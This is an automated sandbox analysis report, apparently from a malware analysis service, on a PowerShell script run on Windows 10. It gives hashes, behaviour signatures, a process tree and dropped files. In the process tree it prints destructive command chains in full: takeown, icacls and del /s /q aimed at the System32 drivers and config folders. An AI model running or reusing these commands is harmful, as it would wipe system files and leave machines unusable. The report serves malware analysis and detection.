Analysis

  • max time kernel: 35s
  • max time network: 36s
  • platform: windows10-2004_x64
  • resource: win10v2004-20240802-en
  • resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted: 13-08-2024 20:55

General

  • Target: trigger.ps1
  • Size: 1KB
  • MD5: 84cb1e2083b8106b83a45c6aa00dd55d
  • SHA1: e12ea5b7deb81774acb89088dc1f2dce755782e9
  • SHA256: 735116a2700250eb6865f98ebef5519c9de350fde9fc5bb0a3b3c18a63486c78
  • SHA512: 4b01e6fcd0776596cf39de15cf7b8777f508246c6fb0f0023067db9116d364bd4693b71d9273c942c9357f18a2a631ec698b7e0a00d3f239da90df0b882e5e3a

Malware Config

Signatures

  • Possible privilege escalation attempt (4 IoCs)
  • Modifies file permissions (1 TTPs, 4 IoCs)
  • Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
    Using powershell.exe command.
  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of WriteProcessMemory (16 IoCs)

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trigger.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4836
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gj21yse0\gj21yse0.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5036
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB853.tmp" "c:\Users\Admin\AppData\Local\Temp\gj21yse0\CSCE78DAEE45C64C88A02D24983DFF65.TMP"
        3⤵
          PID:4912
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\drivers\* >nul && icacls C:\Windows\System32\drivers\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\drivers\* >nul 2>&1 && exit"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3496
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\drivers\*
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:3280
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\drivers\* /grant everyone:(f)
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1156
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\config\* >nul && icacls C:\Windows\System32\config\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\config\* >nul 2>&1 && exit"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:764
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\config\*
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:464
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\config\* /grant everyone:(f)
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2444


    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RESB853.tmp
      Filesize: 1KB
      MD5: 801f096aa731f0143562fe45221d1ce2
      SHA1: a7c5bfbfab02d179f035fa9fe0880bf3c05a7972
      SHA256: 1f9c794c8da614cba9d38cd3496bc4f6ddf22d75bc724f8e589fe96feee4e3f1
      SHA512: b0db5b09456a3f46d54da1397087399e60818fe04648cc6f3e57815e9476d138d3595e554b70e20b8d79870c60acfe2423770fde5b4e1cbd9e879965437b68ab

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ijlmm3zd.m0q.ps1
      Filesize: 60B
      MD5: d17fe0a3f47be24a6453e9ef58c94641
      SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
      SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
      SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\gj21yse0\gj21yse0.dll
      Filesize: 3KB
      MD5: 7614d3cdbb521274796a372b1285d79e
      SHA1: c1dcb355c8a967fbff1e3bd1e7c3a9cdebe74215
      SHA256: ca03f03349e56cd4e43e9140e8f1798003cdaea4d0c216b664514d9369b57cdd
      SHA512: 4a64461e115c636ed24104813f0f19acb28a5d77e04ef453e7bfb8231620c2ccd6962314aa2cd9d4341b4ef58b650fd88b1c7c5664601425d5eb7b12b809d3da

    • \??\c:\Users\Admin\AppData\Local\Temp\gj21yse0\CSCE78DAEE45C64C88A02D24983DFF65.TMP
      Filesize: 652B
      MD5: 23d46548ea27a772f93cbea7cc2a5df4
      SHA1: 42b4fe29c76df577432c7e541a5bb2b93a3ce5a5
      SHA256: ada62ac865e2f9afe8d2619ae85fe3728930f2aa8e75f2aafe95dd3b6063a4e2
      SHA512: 5c19ade94b0e64c36086423ba57140e077ee217a72700840924e2e36ffe666f987a7eadbef6d45ceb97bea746ad6e6d8db56effcf8d55bb6157fe42d7f1291e9

    • \??\c:\Users\Admin\AppData\Local\Temp\gj21yse0\gj21yse0.0.cs
      Filesize: 819B
      MD5: 41f8d18f0172904a2236dd9396ead480
      SHA1: 35e7150c927b97b26d922f07a51e8fe833752933
      SHA256: d842c81d3641d456116098208a48542a96d5e4d256169069189e459cc265cef5
      SHA512: 43dea5a479cf203bde58b412ac1ca7c064048e7d4544b2ef4354773a1805ccba2b85e6772466da0b9409fadaaa0f6f49654ed1e33a9ef75a4d43c3f058773da3

    • \??\c:\Users\Admin\AppData\Local\Temp\gj21yse0\gj21yse0.cmdline
      Filesize: 369B
      MD5: 06152dd5fff67d3e5fc4cea2085eff4f
      SHA1: 39a45416c4398385637f05a79f9902b2bd2ad0ad
      SHA256: 69abf9bd9fbbd31cf31ebb9d2cc4f635751430d5b3bd3ff77b9e2169193137dd
      SHA512: 7f90526e8c77005a67626b6fa91028adfec02932b2647e0d58a9d192b7f6af17e7f975cd19c8acecc13a7df922df0640241d70aae7a484978b0c376b851dc96c

    • memory/4836-0-0x00007FF9CAE13000-0x00007FF9CAE15000-memory.dmp
      Filesize: 8KB

    • memory/4836-12-0x00007FF9CAE10000-0x00007FF9CB8D1000-memory.dmp
      Filesize: 10.8MB

    • memory/4836-11-0x00007FF9CAE10000-0x00007FF9CB8D1000-memory.dmp
      Filesize: 10.8MB

    • memory/4836-10-0x000001944A6F0000-0x000001944A712000-memory.dmp
      Filesize: 136KB

    • memory/4836-25-0x000001944A520000-0x000001944A528000-memory.dmp
      Filesize: 32KB

    • memory/4836-27-0x0000019462BA0000-0x0000019462DBC000-memory.dmp
      Filesize: 2.1MB

    • memory/4836-29-0x00007FF9CAE13000-0x00007FF9CAE15000-memory.dmp
      Filesize: 8KB

    • memory/4836-30-0x00007FF9CAE10000-0x00007FF9CB8D1000-memory.dmp
      Filesize: 10.8MB